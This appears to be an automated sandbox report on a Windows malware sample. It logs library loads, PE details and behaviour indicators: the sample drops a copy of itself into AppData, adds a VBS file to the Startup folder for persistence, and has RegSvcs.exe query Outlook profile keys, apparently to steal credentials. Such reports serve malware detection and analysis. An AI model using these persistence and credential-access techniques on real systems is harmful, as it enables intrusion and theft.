Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: CvzLvta2bG.exe

Static file information: File size 1117184 > 1048576

Source: CvzLvta2bG.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CvzLvta2bG.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CvzLvta2bG.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CvzLvta2bG.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CvzLvta2bG.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CvzLvta2bG.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: CvzLvta2bG.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3598882957.0000000003189000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: definitiveness.exe, 00000002.00000003.2371130161.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, definitiveness.exe, 00000002.00000003.2372727166.0000000003950000.00000004.00001000.00020000.00000000.sdmp, definitiveness.exe, 00000006.00000003.2487622376.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, definitiveness.exe, 00000006.00000003.2486225217.0000000003C80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: definitiveness.exe, 00000002.00000003.2371130161.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, definitiveness.exe, 00000002.00000003.2372727166.0000000003950000.00000004.00001000.00020000.00000000.sdmp, definitiveness.exe, 00000006.00000003.2487622376.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, definitiveness.exe, 00000006.00000003.2486225217.0000000003C80000.00000004.00001000.00020000.00000000.sdmp

Source: CvzLvta2bG.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CvzLvta2bG.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CvzLvta2bG.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CvzLvta2bG.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CvzLvta2bG.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E04B37 LoadLibraryA,GetProcAddress,

0_2_00E04B37

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E28945 push ecx; ret	0_2_00E28958
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00628945 push ecx; ret	2_2_00628958
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C40C push cs; iretd	3_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C50E push cs; iretd	3_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E21D push ecx; ret	3_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C6BE push ebx; ret	3_2_0041C6BF

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

File created: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs

Jump to behavior

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_00E048D7
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E85376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00E85376
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_006048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_006048D7
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00685376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_00685376

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E23187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00E23187

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
